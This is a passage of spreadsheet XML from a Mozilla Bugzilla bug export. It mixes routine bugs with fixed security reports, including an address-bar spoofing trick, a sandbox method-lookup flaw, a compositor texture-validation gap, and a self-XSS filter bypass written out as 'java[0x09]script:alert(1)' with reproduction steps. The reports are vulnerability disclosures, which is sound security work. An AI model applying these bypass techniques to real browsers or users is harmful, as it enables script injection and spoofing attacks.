      <c r="M5976" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5976" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5976" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5976" t="inlineStr">
        <is>
          <t>[sg:moderate] spoof</t>
        </is>
      </c>
      <c r="Q5976" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5976" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5976" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T5976" t="n">
        <v>1</v>
      </c>
      <c r="U5976" t="n">
        <v>0</v>
      </c>
      <c r="V5976" t="n">
        <v>46</v>
      </c>
      <c r="W5976" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.1) Gecko/2008070208 Firefox/1.5.0.xx Alexa Toolbar;MEGAUPLOAD 1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.1) Gecko/2008070208 Firefox/1.5.0.xx Alexa Toolbar;MEGAUPLOAD 1.0
The problem originated, when you try to create a link with javascript (window.open). When you enter an incorrect address seems that the firefox can not translate the address web and display the web address in a blank page.
This blank page can be changed with javascript making can create an attack of the type spoofig.
Reproducible: Always
Steps to Reproduce:
1.Create a html file with a special javascript
2.Open page
Actual Results:  
One can visualize the address unresolved and the blank page amended.
In itself, the mistake is simple. The problem is that with javascript window can be changed by altering the content and halting the loading of the page.</t>
        </is>
      </c>
      <c r="X5976" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5977">
      <c r="A5977" t="n">
        <v>984162</v>
      </c>
      <c r="B5977" t="inlineStr">
        <is>
          <t>2014-03-16 13:34:21 -0700</t>
        </is>
      </c>
      <c r="C5977" t="inlineStr">
        <is>
          <t>[Australis] Static Snippet Icons and Copy</t>
        </is>
      </c>
      <c r="D5977" t="inlineStr">
        <is>
          <t>2014-04-23 13:29:52 -0700</t>
        </is>
      </c>
      <c r="E5977" t="n">
        <v>1</v>
      </c>
      <c r="F5977" t="n">
        <v>1</v>
      </c>
      <c r="G5977" t="n">
        <v>5</v>
      </c>
      <c r="H5977" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5977" t="inlineStr">
        <is>
          <t>Marketing</t>
        </is>
      </c>
      <c r="J5977" t="inlineStr">
        <is>
          <t>Design</t>
        </is>
      </c>
      <c r="K5977" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5977" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5977" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N5977" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5977" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5977" t="inlineStr"/>
      <c r="Q5977" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5977" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5977" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5977" t="n">
        <v>1</v>
      </c>
      <c r="U5977" t="n">
        <v>0</v>
      </c>
      <c r="V5977" t="n">
        <v>43</v>
      </c>
      <c r="W5977" t="inlineStr">
        <is>
          <t>&gt;&gt;Project/Request Title:
[Australis] Static Snippet Icons and Copy
&gt;&gt;Project Overview:
Request for 3-5 Australis Snippet Graphics and Copy. At least 2 images are needed (pre- and post-launch), but they would prefer 3-5 images to avoid fatigue.
Channel: about:Home
Messaging/CTA:
1. Pre-launch: Pre-teaser and to sign up April 2nd for newsletter (updated moz.org/newsletter)
    CTA - sign up to one of the first to know about the launch of the new Firefox 
2. Post-launch: Pointing to add-ons and/or other features
&gt;&gt;Creative Specs &amp; Deliverables:
Snippet Icon: 40x50 svg
Snippet Copy: See messaging/CTA above. May need more clarity from Jean on copy requests, especially for post-launch snippet(s)
&gt;&gt;Launch Date:
Not provided
&gt;&gt;Creative Due Date:
2014-04-15
&gt;&gt;Mozilla Goal:
Firefox Deskop
&gt;&gt;Points of Contact:
ARRAY(0x7f17c5fd2728)</t>
        </is>
      </c>
      <c r="X5977" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5978">
      <c r="A5978" t="n">
        <v>3328</v>
      </c>
      <c r="B5978" t="inlineStr">
        <is>
          <t>1999-02-26 16:30:43 -0800</t>
        </is>
      </c>
      <c r="C5978" t="inlineStr">
        <is>
          <t>Need to get rid of user break on Mac optimized build</t>
        </is>
      </c>
      <c r="D5978" t="inlineStr">
        <is>
          <t>1999-04-21 11:23:35 -0700</t>
        </is>
      </c>
      <c r="E5978" t="n">
        <v>1</v>
      </c>
      <c r="F5978" t="n">
        <v>1</v>
      </c>
      <c r="G5978" t="n">
        <v>6</v>
      </c>
      <c r="H5978" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5978" t="inlineStr">
        <is>
          <t>MozillaClassic Graveyard</t>
        </is>
      </c>
      <c r="J5978" t="inlineStr">
        <is>
          <t>Macintosh FE</t>
        </is>
      </c>
      <c r="K5978" t="inlineStr">
        <is>
          <t>1998-03-31</t>
        </is>
      </c>
      <c r="L5978" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M5978" t="inlineStr">
        <is>
          <t>Mac System 8.5</t>
        </is>
      </c>
      <c r="N5978" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5978" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5978" t="inlineStr"/>
      <c r="Q5978" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5978" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5978" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5978" t="n">
        <v>1</v>
      </c>
      <c r="U5978" t="n">
        <v>0</v>
      </c>
      <c r="V5978" t="n">
        <v>3</v>
      </c>
      <c r="W5978" t="inlineStr">
        <is>
          <t>Per today's seamonkey mtg..enjoy :-)</t>
        </is>
      </c>
      <c r="X5978" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5979">
      <c r="A5979" t="n">
        <v>1288106</v>
      </c>
      <c r="B5979" t="inlineStr">
        <is>
          <t>2016-07-20 07:35:48 -0700</t>
        </is>
      </c>
      <c r="C5979" t="inlineStr">
        <is>
          <t>Explore implementing layout manager for multi row panel</t>
        </is>
      </c>
      <c r="D5979" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E5979" t="n">
        <v>1</v>
      </c>
      <c r="F5979" t="n">
        <v>1</v>
      </c>
      <c r="G5979" t="n">
        <v>6</v>
      </c>
      <c r="H5979" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5979" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5979" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5979" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5979" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5979" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5979" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5979" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5979" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q5979" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5979" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5979" t="inlineStr">
        <is>
          <t>Firefox 51</t>
        </is>
      </c>
      <c r="T5979" t="n">
        <v>1</v>
      </c>
      <c r="U5979" t="n">
        <v>0</v>
      </c>
      <c r="V5979" t="n">
        <v>46</v>
      </c>
      <c r="W5979" t="inlineStr">
        <is>
          <t>Created attachment 8772859
as-panel-mock.png
(See attached screenshot) The current mocks envision a netflix-like panel with multiple rows that can scroll. There's no out-of-the-box Android component for that, so let's explore how we can build this (maybe even outside of Fennec).
It looks like a job for a RecyclerView with a custom LayoutManager. But this could also be a static layout (because we have a static number of rows for now) with a bunch of horizontal list views.
What does Netflix use? Are there articles about writing such a layout or is there sample code? Explore!</t>
        </is>
      </c>
      <c r="X5979" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5980">
      <c r="A5980" t="n">
        <v>97966</v>
      </c>
      <c r="B5980" t="inlineStr">
        <is>
          <t>2001-09-01 19:25:11 -0700</t>
        </is>
      </c>
      <c r="C5980" t="inlineStr">
        <is>
          <t>Query JS nukes old selections.</t>
        </is>
      </c>
      <c r="D5980" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:26 -0800</t>
        </is>
      </c>
      <c r="E5980" t="n">
        <v>1</v>
      </c>
      <c r="F5980" t="n">
        <v>1</v>
      </c>
      <c r="G5980" t="n">
        <v>4</v>
      </c>
      <c r="H5980" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5980" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5980" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K5980" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L5980" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5980" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5980" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5980" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5980" t="inlineStr"/>
      <c r="Q5980" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5980" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5980" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5980" t="n">
        <v>1</v>
      </c>
      <c r="U5980" t="n">
        <v>0</v>
      </c>
      <c r="V5980" t="n">
        <v>19</v>
      </c>
      <c r="W5980" t="inlineStr">
        <is>
          <t>When you add a product to or remove a product from the products field on the
query page, the old selections for components/versions/milestones are nuked. 
You should save and restore them.</t>
        </is>
      </c>
      <c r="X5980" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5981">
      <c r="A5981" t="n">
        <v>213395</v>
      </c>
      <c r="B5981" t="inlineStr">
        <is>
          <t>2003-07-22 04:34:52 -0700</t>
        </is>
      </c>
      <c r="C5981" t="inlineStr">
        <is>
          <t>Mozilla.org Soft Toys</t>
        </is>
      </c>
      <c r="D5981" t="inlineStr">
        <is>
          <t>2014-10-21 20:21:49 -0700</t>
        </is>
      </c>
      <c r="E5981" t="n">
        <v>1</v>
      </c>
      <c r="F5981" t="n">
        <v>1</v>
      </c>
      <c r="G5981" t="n">
        <v>5</v>
      </c>
      <c r="H5981" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5981" t="inlineStr">
        <is>
          <t>Marketing</t>
        </is>
      </c>
      <c r="J5981" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5981" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5981" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5981" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5981" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5981" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5981" t="inlineStr"/>
      <c r="Q5981" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5981" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5981" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5981" t="n">
        <v>1</v>
      </c>
      <c r="U5981" t="n">
        <v>13</v>
      </c>
      <c r="V5981" t="n">
        <v>19</v>
      </c>
      <c r="W5981" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624
Some Mozilla.org Soft Toys would be nice. A red lizard would rock ;)
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X5981" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5982">
      <c r="A5982" t="n">
        <v>1118011</v>
      </c>
      <c r="B5982" t="inlineStr">
        <is>
          <t>2015-01-05 14:19:31 -0800</t>
        </is>
      </c>
      <c r="C5982" t="inlineStr">
        <is>
          <t>Funsize dev environment</t>
        </is>
      </c>
      <c r="D5982" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E5982" t="n">
        <v>1</v>
      </c>
      <c r="F5982" t="n">
        <v>1</v>
      </c>
      <c r="G5982" t="n">
        <v>5</v>
      </c>
      <c r="H5982" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5982" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5982" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5982" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5982" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5982" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5982" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5982" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5982" t="inlineStr">
        <is>
          <t>[funsize]</t>
        </is>
      </c>
      <c r="Q5982" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5982" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5982" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5982" t="n">
        <v>1</v>
      </c>
      <c r="U5982" t="n">
        <v>0</v>
      </c>
      <c r="V5982" t="n">
        <v>2</v>
      </c>
      <c r="W5982" t="inlineStr">
        <is>
          <t>Easy-to-setup (a single command to set up) dev environment for funsize server providing hacking environment. Support for isolated environment inside a Linux container.
This is my 2015 Q1 deliverable.</t>
        </is>
      </c>
      <c r="X5982" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5983">
      <c r="A5983" t="n">
        <v>825697</v>
      </c>
      <c r="B5983" t="inlineStr">
        <is>
          <t>2012-12-31 15:02:23 -0800</t>
        </is>
      </c>
      <c r="C5983" t="inlineStr">
        <is>
          <t>Components.lookupMethod allows calling of SOW functions</t>
        </is>
      </c>
      <c r="D5983" t="inlineStr">
        <is>
          <t>2024-05-30 07:59:01 -0700</t>
        </is>
      </c>
      <c r="E5983" t="n">
        <v>1</v>
      </c>
      <c r="F5983" t="n">
        <v>1</v>
      </c>
      <c r="G5983" t="n">
        <v>3</v>
      </c>
      <c r="H5983" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5983" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5983" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5983" t="inlineStr">
        <is>
          <t>20 Branch</t>
        </is>
      </c>
      <c r="L5983" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5983" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5983" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5983" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5983" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q5983" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5983" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5983" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T5983" t="n">
        <v>1</v>
      </c>
      <c r="U5983" t="n">
        <v>0</v>
      </c>
      <c r="V5983" t="n">
        <v>36</v>
      </c>
      <c r="W5983" t="inlineStr">
        <is>
          <t>Created attachment 696815
lookupMethodpoc.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20121231 Firefox/20.0
Build ID: 20121231030859
Steps to reproduce:
Called Components.lookupMethod to obtain the cloneNode method of a SOW protected node.
Actual results:
I obtained a clone of the node specified in Components.lookupMethod.
Expected results:
Components.lookupMethod should throw an exception as it did in ff 17.</t>
        </is>
      </c>
      <c r="X5983" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5984">
      <c r="A5984" t="n">
        <v>1422643</v>
      </c>
      <c r="B5984" t="inlineStr">
        <is>
          <t>2017-12-03 16:14:02 -0800</t>
        </is>
      </c>
      <c r="C5984" t="inlineStr">
        <is>
          <t>Self-XSS protection bypass with tab characters</t>
        </is>
      </c>
      <c r="D5984" t="inlineStr">
        <is>
          <t>2018-06-28 09:28:07 -0700</t>
        </is>
      </c>
      <c r="E5984" t="n">
        <v>1</v>
      </c>
      <c r="F5984" t="n">
        <v>1</v>
      </c>
      <c r="G5984" t="n">
        <v>2</v>
      </c>
      <c r="H5984" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5984" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5984" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K5984" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L5984" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5984" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5984" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5984" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5984" t="inlineStr">
        <is>
          <t>[fxsearch][adv-main59+]</t>
        </is>
      </c>
      <c r="Q5984" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5984" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5984" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T5984" t="n">
        <v>1</v>
      </c>
      <c r="U5984" t="n">
        <v>0</v>
      </c>
      <c r="V5984" t="n">
        <v>30</v>
      </c>
      <c r="W5984" t="inlineStr">
        <is>
          <t>Created attachment 8934026
poc_self-xss_tab.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Build ID: 20171203100121
Steps to reproduce:
Usually, to mitigate the self-XSS via the address bar, Firefox removes "javascript:" string when "javascript:[XSS_HERE]" URL is pasted to the address bar.
However, if there is a tab character between "javascript:" string, like "java[0x09]script:alert(1)", Firefox does not remove it although JavaScript is executed from that string by tapping the enter key.
Steps to Reproduce:
1. Open the attached PoC.
2. Copy the string in the textarea.
3. Paste it to the address bar.
4. When the enter key is pressed, JavaScript is executed.
Actual results:
The self-XSS protection does not work.
Expected results:
The self-XSS protection should work.</t>
        </is>
      </c>
      <c r="X5984" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5985">
      <c r="A5985" t="n">
        <v>1854669</v>
      </c>
      <c r="B5985" t="inlineStr">
        <is>
          <t>2023-09-22 09:15:15 -0700</t>
        </is>
      </c>
      <c r="C5985" t="inlineStr">
        <is>
          <t>VideoBridge allows any content process to use any texture produced by remote decoder</t>
        </is>
      </c>
      <c r="D5985" t="inlineStr">
        <is>
          <t>2024-04-28 23:34:49 -0700</t>
        </is>
      </c>
      <c r="E5985" t="n">
        <v>1</v>
      </c>
      <c r="F5985" t="n">
        <v>1</v>
      </c>
      <c r="G5985" t="n">
        <v>3</v>
      </c>
      <c r="H5985" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5985" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5985" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5985" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5985" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5985" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5985" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5985" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5985" t="inlineStr">
        <is>
          <t>[adv-main121+][adv-esr115.6+]</t>
        </is>
      </c>
      <c r="Q5985" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5985" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5985" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T5985" t="n">
        <v>1</v>
      </c>
      <c r="U5985" t="n">
        <v>0</v>
      </c>
      <c r="V5985" t="n">
        <v>22</v>
      </c>
      <c r="W5985" t="inlineStr">
        <is>
          <t>The compositor process uses SurfaceDescriptorRemoteDecoder, which contains a source ID and handle, to link a TextureHost created by a helper process (RDD, media utility, GPU process) to a TextureHost created by a content process during display list building:
https://searchfox.org/mozilla-central/rev/48b6992e03fa66f77ac9688ba61c95d31a451bc1/gfx/layers/composite/TextureHost.cpp#340
As you can follow from the code above, we just accept the opaque source/handle without any additional validation.
The source ID is merely which utility process created it, not the process that requested it. We decide which VideoBridgeParent that maps to here:
https://searchfox.org/mozilla-central/rev/48b6992e03fa66f77ac9688ba61c95d31a451bc1/gfx/layers/composite/GPUVideoTextureHost.cpp#41
The handle is the unique ID associated with that particular texture for that utility process:
https://searchfox.org/mozilla-central/rev/077fc34d03b85b09add26b5f99f1a3a3a72c8720/gfx/layers/composite/GPUVideoTextureHost.cpp#47
Nothing stops a compromised content process from using an arbitrary ID. In fact, because we race between the content process creating its own wrapper texture and the utility process creating the actual texture, we gracefully handle the scenario where there is no texture available yet to map to.
We should have some sort of token validation here, where the utility process generates namespace IDs for each content process, shares that with the compositor process, and only allows wrapper textures created by the owning content process to wrap the actual texture from the VideoBridge. This would be similar to how we validate graphics resources in the WebRender display pipeline.</t>
        </is>
      </c>
      <c r="X5985" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5986">
      <c r="A5986" t="n">
        <v>927579</v>
      </c>
      <c r="B5986" t="inlineStr">
        <is>
          <t>2013-10-16 13:33:54 -0700</t>
        </is>
      </c>
      <c r="C5986" t="inlineStr">
        <is>
          <t>crash [@ mlp_process] [@ tansig_approx]</t>
        </is>
      </c>
      <c r="D5986" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:08 -0800</t>
        </is>
      </c>
      <c r="E5986" t="n">
        <v>1</v>
      </c>
      <c r="F5986" t="n">
        <v>1</v>
      </c>
      <c r="G5986" t="n">
        <v>3</v>
      </c>
      <c r="H5986" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5986" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5986" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5986" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5986" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5986" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5986" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5986" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5986" t="inlineStr">
        <is>
          <t>[adv-main28+]</t>
        </is>
      </c>
      <c r="Q5986" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5986" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5986" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T5986" t="n">
        <v>1</v>
      </c>
      <c r="U5986" t="n">
        <v>0</v>
      </c>
      <c r="V5986" t="n">
        <v>36</v>
      </c>
      <c r="W5986" t="inlineStr">
        <is>
          <t>Created attachment 818038
testcase (crashes Firefox)</t>
        </is>
      </c>
      <c r="X5986" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5987">
      <c r="A5987" t="n">
        <v>1179223</v>
      </c>
      <c r="B5987" t="inlineStr">
        <is>
          <t>2015-07-01 06:31:53 -0700</t>
        </is>
      </c>
      <c r="C5987" t="inlineStr">
        <is>
          <t>Determine why the stage mysql bin logs are 222GB large compared to 12GB on prod</t>
        </is>
      </c>
      <c r="D5987" t="inlineStr">
        <is>
          <t>2015-07-15 04:09:36 -0700</t>
        </is>
      </c>
      <c r="E5987" t="n">
        <v>1</v>
      </c>
      <c r="F5987" t="n">
        <v>1</v>
      </c>
      <c r="G5987" t="n">
        <v>7</v>
      </c>
      <c r="H5987" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5987" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5987" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K5987" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5987" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5987" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5987" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5987" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5987" t="inlineStr"/>
      <c r="Q5987" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5987" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5987" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5987" t="n">
        <v>1</v>
      </c>
      <c r="U5987" t="n">
        <v>0</v>
      </c>
      <c r="V5987" t="n">
        <v>16</v>
      </c>
      <c r="W5987" t="inlineStr">
        <is>
          <t>New Relic is saying time to full for the stage DB is 7 days.
Looking at total disk usage vs usage by the binary logs (used for replication)...
Stage:
[emorley@treeherder1.stage.db.scl3 ~]$ sudo su mysql
bash-4.1$ cd /data/mysql/
bash-4.1$ du -ch | tail -n 1
279G    total
bash-4.1$ du -ch treeherder1-bin.* | tail -n 1
222G    total
Prod:
[emorley@treeherder1.db.scl3 ~]$ sudo su mysql
bash-4.1$ cd /data/mysql/
bash-4.1$ du -ch | tail -n 1
649G    total
bash-4.1$ du -ch treeherder1-bin.* | tail -n 1
12G     total
bash-4.1$ du -ch *-bin.* | tail -n 1
12G     total
This really doesn't make sense. It is my understanding that the binary logs are a copy of all non-read operations, and that we keep them for 24 hours for both stage and prod (I've checked the timestamps for both). So in theory, prod and stage should have similar size of logs (since even though stage only keeps 45 days of data, they have similar activity/churn over 24 hours). 
The disk usage seems to have started rising as of the 29th June:
https://rpm.newrelic.com/accounts/677903/servers/6106894/disks?tw[end]=1435756079&amp;tw[start]=1435151279#id=5b2253797374656d2f46696c6573797374656d2f5e646174612f557365642f6279746573222c2253797374656d2f4469736b2f5e6465765e73646231225d
...though they were pretty large prior to that.</t>
        </is>
      </c>
      <c r="X5987" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5988">
      <c r="A5988" t="n">
        <v>39533</v>
      </c>
      <c r="B5988" t="inlineStr">
        <is>
          <t>2000-05-16 17:35:10 -0700</t>
        </is>
      </c>
      <c r="C5988" t="inlineStr">
        <is>
          <t>showdependencygraph.cgi doesn't check viewing permissions</t>
        </is>
      </c>
      <c r="D5988" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E5988" t="n">
        <v>1</v>
      </c>
      <c r="F5988" t="n">
        <v>1</v>
      </c>
      <c r="G5988" t="n">
        <v>4</v>
      </c>
      <c r="H5988" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5988" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5988" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5988" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5988" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5988" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N5988" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5988" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
